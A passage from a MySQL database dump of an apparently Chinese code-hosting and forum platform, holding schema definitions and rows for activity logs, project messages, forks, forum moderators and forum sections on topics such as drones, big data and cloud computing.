08:13:21'),(307,66,199,95,'Issue',NULL,'2019-11-10 12:45:33','2019-11-11 08:13:10'),(308,66,199,96,'Issue',NULL,'2019-11-10 12:46:08','2019-11-11 08:12:56'),(309,50,202,202,'Project',NULL,'2019-11-11 08:49:10','2019-11-11 08:49:10'),(310,49,203,203,'Project',NULL,'2019-11-11 09:01:30','2019-11-11 09:01:30'),(311,46,203,16,'AppliedProject',NULL,'2019-11-11 09:02:34','2019-11-11 09:02:34'),(312,66,203,17,'AppliedProject',NULL,'2019-11-11 09:12:52','2019-11-11 09:12:52'),(313,49,204,204,'Project',NULL,'2019-11-11 09:19:44','2019-11-11 09:19:44'),(314,49,205,205,'Project',NULL,'2019-11-11 09:21:19','2019-11-11 09:21:19'),(315,49,206,206,'Project',NULL,'2019-11-11 09:43:56','2019-11-11 09:43:56'),(317,49,207,207,'Project',NULL,'2019-11-11 09:48:17','2019-11-11 09:48:17'),(319,49,208,208,'Project',NULL,'2019-11-11 09:50:42','2019-11-11 09:50:42'),(321,59,209,209,'Project',NULL,'2019-11-11 09:55:49','2019-11-11 09:55:49'),(322,46,208,97,'Issue',NULL,'2019-11-11 09:59:56','2019-11-11 10:00:12'),(323,59,210,210,'Project',NULL,'2019-11-11 10:04:19','2019-11-11 10:04:19'),(324,59,211,211,'Project',NULL,'2019-11-11 10:05:43','2019-11-11 10:05:43'),(325,49,212,212,'Project',NULL,'2019-11-11 10:10:37','2019-11-11 10:10:37'),(327,59,213,213,'Project',NULL,'2019-11-11 10:13:20','2019-11-11 10:13:20'),(328,50,214,214,'Project',NULL,'2019-11-11 10:20:32','2019-11-11 10:20:32'),(329,50,215,215,'Project',NULL,'2019-11-11 10:21:45','2019-11-11 10:21:45'),(330,50,216,216,'Project',NULL,'2019-11-11 10:23:07','2019-11-11 10:23:07'),(331,46,199,98,'Issue',NULL,'2019-11-11 10:28:02','2019-11-11 14:26:53'),(332,66,199,99,'Issue',NULL,'2019-11-11 10:29:15','2019-11-22 09:44:13'),(333,50,217,217,'Project',NULL,'2019-11-11 10:31:00','2019-11-11 10:31:00'),(334,50,218,218,'Project',NULL,'2019-11-11 10:31:32','2019-11-11 10:31:32'),(335,64,199,100,'Issue',NULL,'2019-11-11 10:33:16','2019-11-22 10:02:10'),(336,64,199,101,'Issue',NULL,'2019-11-11 10:35:21','2019-11-22 09:56:37'),(337,50,219,219,'Project',NULL,'2019-11-11 10:47:56','2019-11-11 10:47:56'),(338,50,220,220,'Project',NULL,'2019-11-11 10:48:19','2019-11-11 10:48:19'),(339,50,221,221,'Project',NULL,'2019-11-11 10:51:15','2019-11-11 10:51:15'),(340,49,222,222,'Project',NULL,'2019-11-11 10:59:08','2019-11-11 10:59:08'),(343,50,223,223,'Project',NULL,'2019-11-11 11:04:25','2019-11-11 11:04:25'),(344,64,224,224,'Project',NULL,'2019-11-11 11:38:58','2019-11-11 11:38:58'),(345,49,225,225,'Project',NULL,'2019-11-11 11:44:39','2019-11-11 11:44:39'),(346,50,226,226,'Project',NULL,'2019-11-11 12:34:37','2019-11-11 12:34:37'),(347,49,227,227,'Project',NULL,'2019-11-11 15:06:58','2019-11-11 15:06:58'),(349,59,228,228,'Project',NULL,'2019-11-11 15:36:02','2019-11-11 15:36:02'),(350,49,229,229,'Project',NULL,'2019-11-11 15:36:46','2019-11-11 15:36:46'),(351,49,230,230,'Project',NULL,'2019-11-11 15:37:23','2019-11-11 15:37:23'),(352,64,231,231,'Project',NULL,'2019-11-11 15:37:29','2019-11-11 15:37:29'),(353,49,232,232,'Project',NULL,'2019-11-11 17:07:52','2019-11-11 17:07:52'),(354,64,232,25,'AppliedProject',NULL,'2019-11-11 17:08:49','2019-11-11 17:08:49'),(355,59,233,233,'Project',NULL,'2019-11-11 17:12:09','2019-11-11 17:12:09'),(356,64,232,102,'Issue',NULL,'2019-11-11 17:13:17','2019-11-11 17:13:34'),(357,49,234,234,'Project',NULL,'2019-11-12 08:57:27','2019-11-12 08:57:27'),(359,49,234,103,'Issue',NULL,'2019-11-12 09:05:56','2019-11-12 09:05:56'),(360,49,235,235,'Project',NULL,'2019-11-12 09:13:45','2019-11-12 09:13:45'),(361,49,235,104,'Issue',NULL,'2019-11-12 09:18:38','2019-11-12 09:18:38'),(362,59,236,236,'Project',NULL,'2019-11-12 10:08:55','2019-11-12 10:08:55'),(363,49,237,237,'Project',NULL,'2019-11-12 10:14:03','2019-11-12 10:14:03'),(364,49,237,105,'Issue',NULL,'2019-11-12 10:16:03','2019-11-12 10:16:03'),(367,46,238,238,'Project',NULL,'2019-11-20 15:09:18','2019-11-20 15:09:18'),(368,46,239,239,'Project',NULL,'2019-11-20 15:25:54','2019-11-20 15:25:54'),(369,46,240,240,'Project',NULL,'2019-11-20 16:47:55','2019-11-20 16:47:55'),(370,46,241,241,'Project',NULL,'2019-11-20 18:18:39','2019-11-20 18:18:39'),(371,46,242,242,'Project',NULL,'2019-11-20 18:20:49','2019-11-20 18:20:49'),(372,64,243,243,'Project',NULL,'2019-11-20 18:22:47','2019-11-20 18:22:47'),(375,46,244,244,'Project',NULL,'2019-11-21 10:55:14','2019-11-21 10:55:14'),(376,46,245,245,'Project',NULL,'2019-11-21 11:12:00','2019-11-21 11:12:00'),(379,46,199,108,'Issue',NULL,'2019-11-22 09:27:07','2019-11-22 09:27:07'),(381,46,199,110,'Issue',NULL,'2019-11-22 10:30:35','2019-11-22 10:30:35'),(382,46,246,246,'Project',NULL,'2019-11-22 15:33:44','2019-11-22 15:33:44'),(383,65,247,247,'Project',NULL,'2019-11-22 15:38:06','2019-11-22 15:38:06'),(384,65,248,248,'Project',NULL,'2019-11-22 15:41:18','2019-11-22 15:41:18'),(385,72,249,249,'Project',NULL,'2019-11-24 21:57:17','2019-11-24 21:57:17'),(386,50,250,250,'Project',NULL,'2019-12-04 08:21:58','2019-12-04 08:21:58'),(387,75,251,251,'Project',NULL,'2020-02-01 19:03:09','2020-02-01 19:03:09'),(388,75,252,252,'Project',NULL,'2020-02-01 21:17:31','2020-02-01 21:17:31'),(389,75,253,253,'Project',NULL,'2020-02-01 22:24:23','2020-02-01 22:24:23'),(390,77,254,254,'Project',NULL,'2020-02-02 23:36:38','2020-02-02 23:36:38'),(391,77,255,255,'Project',NULL,'2020-02-03 12:08:29','2020-02-03 12:08:29'),(392,55,256,256,'Project',NULL,'2020-02-03 16:57:11','2020-02-03 16:57:11'),(393,78,257,257,'Project',NULL,'2020-02-03 17:36:28','2020-02-03 17:36:28'),(394,48,258,258,'Project',NULL,'2020-02-03 17:45:42','2020-02-03 17:45:42'),(395,47,259,259,'Project',NULL,'2020-02-03 19:30:28','2020-02-03 19:30:28'),(396,47,260,260,'Project',NULL,'2020-02-03 19:30:53','2020-02-03 19:30:53'),(397,76,251,111,'Issue',NULL,'2020-02-04 22:00:33','2020-02-04 22:00:33'),(398,103,261,261,'Project',NULL,'2020-02-10 12:26:21','2020-02-10 12:26:21'),(399,103,262,262,'Project',NULL,'2020-02-10 15:22:56','2020-02-10 15:22:56'),(400,103,263,263,'Project',NULL,'2020-02-10 15:24:55','2020-02-10 15:24:55'),(401,103,264,264,'Project',NULL,'2020-02-10 15:37:24','2020-02-10 15:37:24'),(402,103,265,265,'Project',NULL,'2020-02-11 09:18:05','2020-02-11 09:18:05'),(403,103,266,266,'Project',NULL,'2020-02-11 09:30:09','2020-02-11 09:30:09'),(404,55,267,267,'Project',NULL,'2020-02-11 09:39:11','2020-02-11 09:39:11'),(405,47,268,268,'Project',NULL,'2020-02-11 09:40:38','2020-02-11 09:40:38'),(406,47,269,269,'Project',NULL,'2020-02-11 09:46:46','2020-02-11 09:46:46'),(407,81,255,112,'Issue',NULL,'2020-02-11 09:54:10','2020-02-11 11:29:44'),(408,81,255,113,'Issue',NULL,'2020-02-11 10:04:09','2020-02-11 10:04:09'),(409,81,255,114,'Issue',NULL,'2020-02-11 10:05:52','2020-02-11 21:01:22'),(410,47,270,270,'Project',NULL,'2020-02-11 10:06:32','2020-02-11 10:06:32'),(411,81,255,115,'Issue',NULL,'2020-02-11 10:07:24','2020-03-19 14:13:32'),(412,81,255,116,'Issue',NULL,'2020-02-11 10:10:24','2020-02-11 10:10:24'),(413,81,255,117,'Issue',NULL,'2020-02-11 10:11:35','2020-02-11 10:11:35'),(414,81,255,118,'Issue',NULL,'2020-02-11 10:12:28','2020-02-11 10:12:28'),(415,81,255,119,'Issue',NULL,'2020-02-11 10:14:14','2020-02-11 10:14:14'),(416,81,255,120,'Issue',NULL,'2020-02-11 10:15:28','2020-02-11 10:15:28'),(417,81,255,121,'Issue',NULL,'2020-02-11 10:19:27','2020-02-11 10:19:27'),(418,81,255,122,'Issue',NULL,'2020-02-11 10:19:58','2020-02-11 10:20:52'),(419,81,255,123,'Issue',NULL,'2020-02-11 10:22:01','2020-02-11 10:22:01'),(420,81,255,124,'Issue',NULL,'2020-02-11 10:22:04','2020-02-11 10:22:04'),(421,81,255,125,'Issue',NULL,'2020-02-11 10:22:56','2020-02-11 11:31:22'),(422,81,255,126,'Issue',NULL,'2020-02-11 10:23:32','2020-02-11 10:42:16'),(423,81,255,127,'Issue',NULL,'2020-02-11 10:24:14','2020-02-11 10:24:14'),(424,81,255,128,'Issue',NULL,'2020-02-11 10:24:55','2020-02-11 10:24:55'),(425,81,255,129,'Issue',NULL,'2020-02-11 10:25:44','2020-02-24 18:32:31'),(426,81,255,130,'Issue',NULL,'2020-02-11 10:26:30','2020-02-11 10:26:30'),(427,81,255,131,'Issue',NULL,'2020-02-11 10:27:27','2020-02-11 10:27:27'),(428,47,271,271,'Project',NULL,'2020-02-11 11:10:56','2020-02-11 11:10:56'),(429,99,255,132,'Issue',NULL,'2020-02-11 16:39:25','2020-02-13 08:26:49'),(430,99,255,133,'Issue',NULL,'2020-02-11 16:40:27','2020-02-13 08:26:15'),(431,99,255,134,'Issue',NULL,'2020-02-11 16:45:53','2020-02-13 08:25:36'),(432,99,255,135,'Issue',NULL,'2020-02-11 17:02:48','2020-02-11 17:03:23'),(433,83,255,136,'Issue',NULL,'2020-02-11 19:52:24','2020-02-12 08:35:19'),(434,83,255,137,'Issue',NULL,'2020-02-11 19:59:30','2020-02-11 19:59:30'),(435,83,255,138,'Issue',NULL,'2020-02-11 20:04:38','2020-02-11 20:04:38'),(436,83,255,139,'Issue',NULL,'2020-02-11 20:08:12','2020-02-11 20:08:12'),(437,80,272,272,'Project',NULL,'2020-03-09 10:22:41','2020-03-09 10:22:41'),(438,51,273,273,'Project',NULL,'2020-03-14 09:33:12','2020-03-14 09:33:12'),(439,105,255,31,'AppliedProject',NULL,'2020-03-19 15:15:56','2020-03-19 15:15:56'),(440,45,274,274,'Project',NULL,'2020-03-27 19:19:54','2020-03-27 19:19:54'),(441,46,275,275,'Project',NULL,'2020-05-13 09:17:41','2020-05-13 09:17:41');
|
||
/*!40000 ALTER TABLE `forge_activities` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `forge_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `forge_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `forge_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`forge_message_id` int(11) DEFAULT NULL,
|
||
`forge_message_type` varchar(255) DEFAULT NULL,
|
||
`viewed` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`secret_key` varchar(255) DEFAULT NULL,
|
||
`status` int(11) DEFAULT NULL,
|
||
`operate_user_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_forge_messages_on_user_id_and_project_id_and_created_at` (`user_id`,`project_id`,`created_at`),
|
||
KEY `index_forge_messages_on_forge_message_id_and_forge_message_type` (`forge_message_id`,`forge_message_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `forge_messages`
|
||
--
|
||
|
||
LOCK TABLES `forge_messages` WRITE;
|
||
/*!40000 ALTER TABLE `forge_messages` DISABLE KEYS */;
|
||
INSERT INTO `forge_messages` VALUES (1,1,13,5,'JoinProject',1,'2018-08-02 21:30:24','2018-08-02 21:30:24',NULL,NULL,NULL),(2,59,188,49,'RemoveFromProject',1,'2019-10-31 15:16:02','2019-10-31 15:16:02',NULL,NULL,NULL),(3,61,188,49,'RemoveFromProject',1,'2019-10-31 15:16:33','2019-10-31 15:16:33',NULL,NULL,NULL),(4,63,199,49,'RemoveFromProject',0,'2019-11-24 15:10:20','2019-11-24 15:10:20',NULL,NULL,NULL),(5,66,199,49,'RemoveFromProject',0,'2019-11-24 15:13:52','2019-11-24 15:13:52',NULL,NULL,NULL);
|
||
/*!40000 ALTER TABLE `forge_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `fork_users`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `fork_users`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `fork_users` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`fork_project_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_fork_users_on_project_id` (`project_id`),
|
||
KEY `index_fork_users_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=53 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `fork_users`
|
||
--
|
||
|
||
LOCK TABLES `fork_users` WRITE;
|
||
/*!40000 ALTER TABLE `fork_users` DISABLE KEYS */;
|
||
INSERT INTO `fork_users` VALUES (2,376,379,49,'2020-08-20 01:49:28','2020-08-20 01:49:28'),(3,376,380,47,'2020-08-20 10:19:17','2020-08-20 10:19:17'),(4,378,381,1,'2020-08-21 01:03:38','2020-08-21 01:03:38'),(5,392,395,115,'2020-09-08 05:35:44','2020-09-08 05:35:44'),(6,370,397,49,'2020-10-15 00:53:52','2020-10-15 00:53:52'),(7,400,403,49,'2020-10-16 02:16:13','2020-10-16 02:16:13'),(8,400,404,46,'2020-10-16 06:51:53','2020-10-16 06:51:53'),(12,376,453,115,'2021-01-07 02:49:58','2021-01-07 02:49:58'),(19,397,473,155,'2021-01-22 08:01:06','2021-01-22 08:01:06'),(20,477,478,158,'2021-01-28 08:10:18','2021-01-28 08:10:18'),(21,477,479,157,'2021-01-28 08:13:15','2021-01-28 08:13:15'),(22,477,480,137,'2021-01-28 08:18:32','2021-01-28 08:18:32'),(23,477,481,122,'2021-01-28 08:27:28','2021-01-28 08:27:28'),(24,477,482,120,'2021-01-28 08:29:08','2021-01-28 08:29:08'),(25,477,483,46,'2021-01-28 08:59:06','2021-01-28 08:59:06'),(27,477,485,159,'2021-01-28 10:30:27','2021-01-28 10:30:27'),(28,477,486,121,'2021-01-28 14:08:58','2021-01-28 14:08:58'),(29,477,487,152,'2021-01-28 14:11:30','2021-01-28 14:11:30'),(30,477,488,160,'2021-01-28 15:41:48','2021-01-28 15:41:48'),(31,477,489,164,'2021-02-20 03:43:09','2021-02-20 03:43:09'),(32,494,495,73,'2021-02-22 09:06:57','2021-02-22 09:06:57'),(33,477,496,182,'2021-02-25 01:18:01','2021-02-25 01:18:01'),(34,430,500,128,'2021-02-25 09:23:46','2021-02-25 09:23:46'),(35,477,501,181,'2021-02-26 00:33:20','2021-02-26 00:33:20'),(36,477,503,179,'2021-03-01 07:22:50','2021-03-01 07:22:50'),(37,477,506,173,'2021-03-05 01:00:06','2021-03-05 01:00:06'),(38,477,507,165,'2021-03-05 01:07:19','2021-03-05 01:07:19'),(40,477,512,186,'2021-03-06 02:41:43','2021-03-06 02:41:43'),(41,477,513,206,'2021-03-06 05:34:14','2021-03-06 05:34:14'),(42,477,514,171,'2021-03-06 10:12:35','2021-03-06 10:12:35'),(43,477,515,189,'2021-03-06 12:24:24','2021-03-06 12:24:24'),(44,477,516,162,'2021-03-07 09:47:22','2021-03-07 09:47:22'),(45,477,517,190,'2021-03-09 08:27:31','2021-03-09 08:27:31'),(46,477,518,174,'2021-03-10 01:24:54','2021-03-10 01:24:54'),(47,477,520,215,'2021-03-10 12:44:46','2021-03-10 12:44:46'),(48,477,521,210,'2021-03-11 01:23:26','2021-03-11 01:23:26'),(49,370,522,181,'2021-03-11 03:49:28','2021-03-11 03:49:28'),(50,477,523,216,'2021-03-11 06:49:44','2021-03-11 06:49:44'),(51,477,524,218,'2021-03-11 07:12:58','2021-03-11 07:12:58'),(52,477,525,194,'2021-03-15 02:11:41','2021-03-15 02:11:41');
|
||
/*!40000 ALTER TABLE `fork_users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `forum_moderators`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `forum_moderators`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `forum_moderators` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`forum_section_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`is_children` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_forum_moderators_on_user_id_and_forum_section_id` (`user_id`,`forum_section_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `forum_moderators`
|
||
--
|
||
|
||
LOCK TABLES `forum_moderators` WRITE;
|
||
/*!40000 ALTER TABLE `forum_moderators` DISABLE KEYS */;
|
||
INSERT INTO `forum_moderators` VALUES (1,49,4,'2020-01-17 16:30:21','2020-01-17 16:30:21',1),(2,107,6,'2020-08-07 14:57:10','2020-08-07 14:57:10',1),(3,108,6,'2020-08-07 14:57:10','2020-08-07 14:57:10',1),(4,111,6,'2020-08-07 14:57:10','2020-08-07 14:57:10',1),(5,111,7,'2020-08-10 14:25:28','2020-08-10 14:25:28',1),(6,109,7,'2020-08-10 14:25:28','2020-08-10 14:25:28',1),(7,110,7,'2020-08-10 14:25:28','2020-08-10 14:25:28',1),(10,1,13,'2020-08-21 09:32:40','2020-08-21 09:32:40',1),(11,1,14,'2020-08-21 09:32:40','2020-08-21 09:32:40',1),(12,46,12,'2020-08-24 09:53:16','2020-08-24 09:53:16',0),(13,46,13,'2020-08-24 09:53:16','2020-08-24 09:53:16',1),(14,46,14,'2020-08-24 09:53:16','2020-08-24 09:53:16',1),(15,1,12,'2020-08-24 10:58:18','2020-08-24 10:58:18',0),(17,4,10,'2021-01-08 15:44:23','2021-01-08 15:44:23',0);
|
||
/*!40000 ALTER TABLE `forum_moderators` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `forum_sections`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `forum_sections`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `forum_sections` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`position` int(11) DEFAULT '0',
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`is_recommend` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`ancestry` varchar(255) DEFAULT NULL,
|
||
`attachment_id` int(11) DEFAULT NULL,
|
||
`description` text,
|
||
`memos_count` int(11) DEFAULT '0',
|
||
`watchers_count` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_forum_sections_on_user_id` (`user_id`),
|
||
KEY `index_forum_sections_on_ancestry` (`ancestry`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=39 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `forum_sections`
|
||
--
|
||
|
||
LOCK TABLES `forum_sections` WRITE;
|
||
/*!40000 ALTER TABLE `forum_sections` DISABLE KEYS */;
|
||
INSERT INTO `forum_sections` VALUES (2,50,'小数据',2,1,0,'2020-01-10 14:11:38','2020-01-10 14:11:38','1',NULL,NULL,3,0),(8,1,'论坛管理',11,NULL,0,'2020-02-13 10:14:05','2020-08-14 17:11:50',NULL,NULL,NULL,2,0),(10,111,'学术研究',15,NULL,0,'2020-07-08 10:52:40','2020-08-17 16:09:23',NULL,NULL,'',5,0),(12,111,'技术交流',28,NULL,1,'2020-07-23 14:21:21','2020-10-14 14:54:54',NULL,1099,'',3,0),(13,111,'无人机',12,12,0,'2020-07-23 14:21:41','2021-01-18 19:05:28','12',1176,'无人机在各个领域都有很大的应用前景,相关技术的发展日新月异,本版块主要关注无人机包括相关软件、硬件等关键技术。',4,18),(14,111,'大数据',13,12,0,'2020-07-23 14:22:38','2020-08-21 09:31:35','12',1177,'大数据时代已经到来,相关技术的发展越来越快,应用越来越广泛和深入。本版块主要讨论大数据前沿技术、平台和应用等。',3,1),(21,1,'云计算',16,NULL,0,'2020-08-13 09:45:17','2020-08-17 16:29:27','12',1178,'云计算已经成为当前信息社会的一项关键服务,通过基础设施即服务(IaaS)、平台即服务(PaaS)和软件即服务(SaaS)等类型提供服务。本版块重点关注云计算相关技术与应用。',1,1),(22,1,'人工智能3级板块',17,NULL,0,'2020-08-13 09:49:08','2020-08-17 16:02:28','12/21',NULL,'1',0,0),(24,1,'人工智能',19,NULL,0,'2020-08-13 16:58:49','2020-08-17 15:59:56','12',NULL,'',0,1),(25,1,'军事理论',20,NULL,0,'2020-08-17 15:39:51','2020-08-17 16:07:18','10',NULL,'',0,0),(26,1,'政策法规',21,NULL,0,'2020-08-17 15:41:11','2020-08-17 16:06:25','10',NULL,'',0,0),(27,1,'组织管理',22,NULL,0,'2020-08-17 15:41:24','2020-08-17 16:06:00','10',NULL,'',0,0),(28,1,'经济金融',23,NULL,0,'2020-08-17 15:42:08','2020-08-17 16:05:49','10',NULL,'',0,0),(29,1,'常见问题',24,NULL,0,'2020-08-17 15:57:43','2020-08-17 15:59:15','8',NULL,'',1,0),(30,1,'建议反馈',25,NULL,0,'2020-08-17 15:58:48','2020-08-17 15:58:48','8',NULL,'',0,0),(31,1,'平台使用',26,NULL,0,'2020-08-17 15:58:56','2020-08-17 15:58:56','8',NULL,'',0,0),(32,1,'量子计算',27,NULL,0,'2020-08-17 16:01:28','2020-08-17 16:01:28','12',NULL,'',0,0),(33,1,'供需对接',14,NULL,0,'2020-08-17 16:07:34','2020-08-17 16:09:45',NULL,NULL,'',0,0),(34,1,'关键技术',29,NULL,0,'2020-08-17 16:08:34','2020-08-17 16:08:34','33',NULL,'',0,0),(35,1,'工具服务',30,NULL,0,'2020-08-17 16:08:59','2020-08-17 16:08:59','33',NULL,'',0,0),(37,46,'数据挖掘',31,NULL,0,'2020-08-24 09:52:46','2021-01-19 07:55:46','12',NULL,'探讨关于数据挖掘的最新动态',0,12),(38,1,'风雷软件',32,NULL,0,'2021-01-06 15:32:00','2021-02-24 10:32:42','12',1351,'风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。软件具有良好的通用性和可扩展性,可用于结构网格、非结构网格、混合网格、重叠网格等不同网格的计算。',0,2);
|
||
/*!40000 ALTER TABLE `forum_sections` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `forums`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `forums`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `forums` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL,
|
||
`description` text,
|
||
`topic_count` int(11) DEFAULT '0',
|
||
`memo_count` int(11) DEFAULT '0',
|
||
`last_memo_id` int(11) DEFAULT '0',
|
||
`creator_id` int(11) NOT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`sticky` int(11) DEFAULT NULL,
|
||
`locked` int(11) DEFAULT NULL,
|
||
`visits` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `forums`
|
||
--
|
||
|
||
LOCK TABLES `forums` WRITE;
|
||
/*!40000 ALTER TABLE `forums` DISABLE KEYS */;
|
||
INSERT INTO `forums` VALUES (1,'行业新闻',NULL,8,1,77,1,'2018-07-06 10:22:50','2019-01-17 17:06:51',1,NULL,0),(2,'人工智能',NULL,13,0,55,1,'2018-07-06 10:22:57','2019-01-17 17:06:57',2,NULL,0),(3,'大数据',NULL,4,0,87,1,'2018-07-06 10:28:38','2019-01-17 17:07:03',3,NULL,0),(4,'云计算',NULL,1,0,6,1,'2018-07-06 10:28:47','2019-01-17 17:07:11',4,NULL,0),(5,'区块链',NULL,1,0,36,1,'2018-07-06 10:28:58','2019-01-17 17:07:17',5,NULL,0),(7,'知识工程',NULL,4,0,18,1,'2018-07-06 10:29:14','2019-01-17 19:25:37',6,NULL,0),(8,'移动开发',NULL,0,0,0,1,'2018-07-06 10:29:21','2019-01-17 19:25:54',9,NULL,0),(9,'系统运维',NULL,0,0,NULL,1,'2018-07-06 10:29:30','2019-01-17 19:26:06',8,NULL,0),(10,'虚拟现实',NULL,0,0,0,1,'2019-01-17 18:26:59','2019-01-17 18:26:59',NULL,NULL,0),(11,'机器学习',NULL,0,0,0,1,'2019-01-17 18:27:05','2019-01-17 18:27:05',NULL,NULL,0),(12,'人机交互',NULL,0,0,0,1,'2019-01-17 18:27:09','2019-01-17 18:27:09',NULL,NULL,0),(13,'信息检索',NULL,0,0,0,1,'2019-01-17 18:27:15','2019-01-17 18:27:15',NULL,NULL,0);
|
||
/*!40000 ALTER TABLE `forums` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `forwards`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `forwards`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `forwards` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`from_id` int(11) DEFAULT NULL,
|
||
`from_type` varchar(255) DEFAULT NULL,
|
||
`to_id` int(11) DEFAULT NULL,
|
||
`to_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `forwards`
|
||
--
|
||
|
||
LOCK TABLES `forwards` WRITE;
|
||
/*!40000 ALTER TABLE `forwards` DISABLE KEYS */;
|
||
INSERT INTO `forwards` VALUES (1,766,'Attachment',767,'Attachment','2019-10-08 13:49:53');
|
||
/*!40000 ALTER TABLE `forwards` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `grades`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `grades`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `grades` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`score` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `grades`
|
||
--
|
||
|
||
LOCK TABLES `grades` WRITE;
|
||
/*!40000 ALTER TABLE `grades` DISABLE KEYS */;
|
||
